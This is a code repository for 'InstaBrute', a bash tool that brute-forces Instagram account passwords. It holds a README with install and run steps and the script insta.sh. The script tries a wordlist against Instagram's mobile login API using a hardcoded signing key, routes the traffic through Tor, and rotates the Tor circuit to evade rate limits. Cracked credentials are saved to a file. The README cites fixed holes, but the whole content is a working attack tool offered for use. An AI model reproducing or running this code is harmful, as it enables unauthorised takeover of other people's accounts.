├── README.md ├── insta.sh └── passwords.lst /README.md: -------------------------------------------------------------------------------- 1 | # InstaBrute 2 | # InstaBrute Two Ways to Brute-force Instagram Account Hacking 3 | 4 | ### what is a InstaBrute 5 | 6 | ### Instagram contained two distinct vulnerabilities that allowed an attacker to brute-force 7 | ### passwords of user accounts. Combined with user enumeration, a weak password policy 8 | ### no 2FA nor other mitigating security controls, this could have allowed an attacker to compromise 9 | ### many accounts without any user interaction, including high-profile ones. 10 | ### Facebook fixed both issues and awarded a combined bounty of $5.000. 11 | 12 | 13 | ### Download&install 14 | 15 | ### apt-get install tor 16 | 17 | ### git clone https://github.com/Ha3MrX/InstaBrute 18 | 19 | ### cd InstaBrute 20 | 21 | ### chmod +x insta.sh 22 | 23 | ### ./insta.sh 24 | 25 | ### screenshot 26 | 27 | ![capture](https://user-images.githubusercontent.com/33704360/39670422-5738279c-510d-11e8-9f6d-a8e24114a510.PNG) 28 | 29 | ### YouTube Channel 30 | 31 | ### https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA 32 | 33 | ### Viddeo Tutorial 34 | 35 | ### https://www.youtube.com/watch?v=a-moMHuZX_Q&t=11s 36 | -------------------------------------------------------------------------------- /insta.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # FB by: https://www.youtube.com/c/HA-MRX 3 | # Instagram: @iemprator_ha_mrx 4 | 5 | trap 'store;exit 1' 2 6 | string4=$(openssl rand -hex 32 | cut -c 1-4) 7 | string8=$(openssl rand -hex 32 | cut -c 1-8) 8 | string12=$(openssl rand -hex 32 | cut -c 1-12) 9 | string16=$(openssl rand -hex 32 | cut -c 1-16) 10 | device="android-$string16" 11 | uuid=$(openssl rand -hex 32 | cut -c 1-32) 12 | phone="$string8-$string4-$string4-$string4-$string12" 13 | guid="$string8-$string4-$string4-$string4-$string12" 14 | var=$(curl -i -s -H "$header" https://i.instagram.com/api/v1/si/fetch_headers/?challenge_type=signup&guid=$uuid > /dev/null) 15 | var2=$(echo $var | awk -F ';' '{print $2}' | cut -d '=' -f3) 16 | 17 | checkroot() { 18 | if [[ "$(id -u)" -ne 0 ]]; then 19 | printf "\e[1;77mPlease, run this program as root!\n\e[0m" 20 | exit 1 21 | fi 22 | } 23 | 24 | dependencies() { 25 | 26 | command -v openssl > /dev/null 2>&1 || { echo >&2 "I require openssl but it's not installed. Aborting."; exit 1; } 27 | command -v tor > /dev/null 2>&1 || { echo >&2 "I require tor but it's not installed. Aborting."; exit 1; } 28 | command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Aborting."; exit 1; } 29 | command -v awk > /dev/null 2>&1 || { echo >&2 "I require awk but it's not installed. Aborting."; exit 1; } 30 | command -v sed > /dev/null 2>&1 || { echo >&2 "I require sed but it's not installed. Aborting."; exit 1; } 31 | command -v cat > /dev/null 2>&1 || { echo >&2 "I require cat but it's not installed. Aborting."; exit 1; } 32 | command -v tr > /dev/null 2>&1 || { echo >&2 "I require tr but it's not installed. Aborting."; exit 1; } 33 | command -v wc > /dev/null 2>&1 || { echo >&2 "I require wc but it's not installed. Aborting."; exit 1; } 34 | command -v cut > /dev/null 2>&1 || { echo >&2 "I require cut but it's not installed. Aborting."; exit 1; } 35 | command -v uniq > /dev/null 2>&1 || { echo >&2 "I require uniq but it's not installed. Aborting."; exit 1; } 36 | if [ $(ls /dev/urandom >/dev/null; echo $?) == "1" ]; then 37 | echo "/dev/urandom not found!" 38 | exit 1 39 | fi 40 | 41 | } 42 | 43 | banner() { 44 | 45 | printf "\e[1;92m _ \e[0m\n" 46 | printf "\e[1;92m _ | | https://www.youtube.com/c/HA-MRX \e[0m\n" 47 | printf "\e[1;92m( \ | | ____ ___ _| |_ _____ \e[0m\n" 48 | printf "\e[1;92m ) )| || _ \ /___)(_ _)(____ | Ha3MrX \e[0m\n" 49 | printf "\e[1;77m(_/ | || | | ||___ | | |_ / ___ | _____ \e[0m\n" 50 | printf "\e[1;77m |_||_| |_|(___/ \__)\_____| (_____) \e[0m\n" 51 | printf "\n" 52 | printf "\e[1;77m\e[45m Instagram Brute Forcer v1.5 Author: Ha3MrX (Github/IG) \e[0m\n" 53 | printf "\n" 54 | } 55 | 56 | function start() { 57 | banner 58 | checkroot 59 | dependencies 60 | read -p $'\e[1;92mUsername account: \e[0m' user 61 | checkaccount=$(curl -s https://www.instagram.com/$user/?__a=1 | grep -c "the page may have been removed") 62 | if [[ "$checkaccount" == 1 ]]; then 63 | printf "\e[1;91mInvalid Username! Try again\e[0m\n" 64 | sleep 1 65 | start 66 | else 67 | default_wl_pass="passwords.lst" 68 | read -p $'\e[1;92mPassword List (Enter to default list): \e[0m' wl_pass 69 | wl_pass="${wl_pass:-${default_wl_pass}}" 70 | default_threads="10" 71 | read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads 72 | threads="${threads:-${default_threads}}" 73 | fi 74 | } 75 | 76 | checktor() { 77 | 78 | check=$(curl --socks5 localhost:9050 -s https://check.torproject.org > /dev/null; echo $?) 79 | 80 | if [[ "$check" -gt 0 ]]; then 81 | printf "\e[1;91mPlease, check your TOR Connection! Just type tor or service tor start\n\e[0m" 82 | exit 1 83 | fi 84 | 85 | } 86 | 87 | function store() { 88 | 89 | if [[ -n "$threads" ]]; then 90 | printf "\e[1;91m [*] Waiting threads shutting down...\n\e[0m" 91 | if [[ "$threads" -gt 10 ]]; then 92 | sleep 6 93 | else 94 | sleep 3 95 | fi 96 | default_session="Y" 97 | printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $user 98 | read -p $'\e[1;77m? [Y/n]: \e[0m' session 99 | session="${session:-${default_session}}" 100 | if [[ "$session" == "Y" || "$session" == "y" || "$session" == "yes" || "$session" == "Yes" ]]; then 101 | if [[ ! -d sessions ]]; then 102 | mkdir sessions 103 | fi 104 | printf "user=\"%s\"\npass=\"%s\"\nwl_pass=\"%s\"\n" $user $pass $wl_pass > sessions/store.session.$user.$(date +"%FT%H%M") 105 | printf "\e[1;77mSession saved.\e[0m\n" 106 | printf "\e[1;92mUse ./instashell --resume\n" 107 | else 108 | exit 1 109 | fi 110 | else 111 | exit 1 112 | fi 113 | } 114 | 115 | 116 | function changeip() { 117 | 118 | killall -HUP tor 119 | #sleep 3 120 | 121 | } 122 | 123 | function bruteforcer() { 124 | 125 | checktor 126 | count_pass=$(wc -l $wl_pass | cut -d " " -f1) 127 | printf "\e[1;92mUsername:\e[0m\e[1;77m %s\e[0m\n" $user 128 | printf "\e[1;92mWordlist:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass 129 | printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m" 130 | 131 | startline=1 132 | endline="$threads" 133 | while [ true ]; do 134 | IFS=$'\n' 135 | for pass in $(sed -n ''$startline','$endline'p' $wl_pass); do 136 | header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' 137 | 138 | data='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass'", "login_attempt_count":"0"}' 139 | ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178" 140 | 141 | countpass=$(grep -n "$pass" "$wl_pass" | cut -d ":" -f1) 142 | hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2) 143 | useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' 144 | 145 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass 146 | 147 | {(trap '' SIGINT && var=$(curl --socks5 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "200\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.passwords ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.passwords \n\e[0m"; kill -1 $$ ; elif [[ $var == "200" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.passwords ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.passwords \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!; 148 | let startline+=$threads 149 | let endline+=$threads 150 | changeip 151 | done 152 | } 153 | 154 | 155 | 156 | function resume() { 157 | 158 | banner 159 | checktor 160 | counter=1 161 | if [[ ! -d sessions ]]; then 162 | printf "\e[1;91m[*] No sessions\n\e[0m" 163 | exit 1 164 | fi 165 | printf "\e[1;92mFiles sessions:\n\e[0m" 166 | for list in $(ls sessions/store.session*); do 167 | IFS=$'\n' 168 | source $list 169 | printf "\e[1;92m%s \e[0m\e[1;77m: %s (\e[0m\e[1;92mwl:\e[0m\e[1;77m %s\e[0m\e[1;92m,\e[0m\e[1;92m lastpass:\e[0m\e[1;77m %s )\n\e[0m" "$counter" "$list" "$wl_pass" "$pass" 170 | let counter++ 171 | done 172 | read -p $'\e[1;92mChoose a session number: \e[0m' fileresume 173 | source $(ls sessions/store.session* | sed ''$fileresume'q;d') 174 | default_threads="10" 175 | read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads 176 | threads="${threads:-${default_threads}}" 177 | 178 | printf "\e[1;92m[*] Resuming session for user:\e[0m \e[1;77m%s\e[0m\n" $user 179 | printf "\e[1;92m[*] Wordlist: \e[0m \e[1;77m%s\e[0m\n" $wl_pass 180 | printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m" 181 | count_pass=$(wc -l $wl_pass | cut -d " " -f1) 182 | startline="$threads" 183 | while [ true ]; do 184 | IFS=$'\n' 185 | for pass in $(sed -n '/'$pass'/,'$startline'p' $wl_pass); do 186 | header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' 187 | 188 | data='{"phone_id":"$phone", "_csrftoken":"$var2", "username":"'$user'", "guid":"$guid", "device_id":"$device", "password":"'$pass'", "login_attempt_count":"0"}' 189 | ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178" 190 | 191 | countpass=$(grep -n "$pass" "$wl_pass" | cut -d ":" -f1) 192 | hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2) 193 | useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' 194 | 195 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass 196 | 197 | {(trap '' SIGINT && var=$(curl --socks5 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "200\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "200" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!; 198 | let startline+=$threads 199 | changeip 200 | done 201 | } 202 | 203 | case "$1" in --resume) resume ;; *) 204 | start 205 | bruteforcer 206 | esac 207 | --------------------------------------------------------------------------------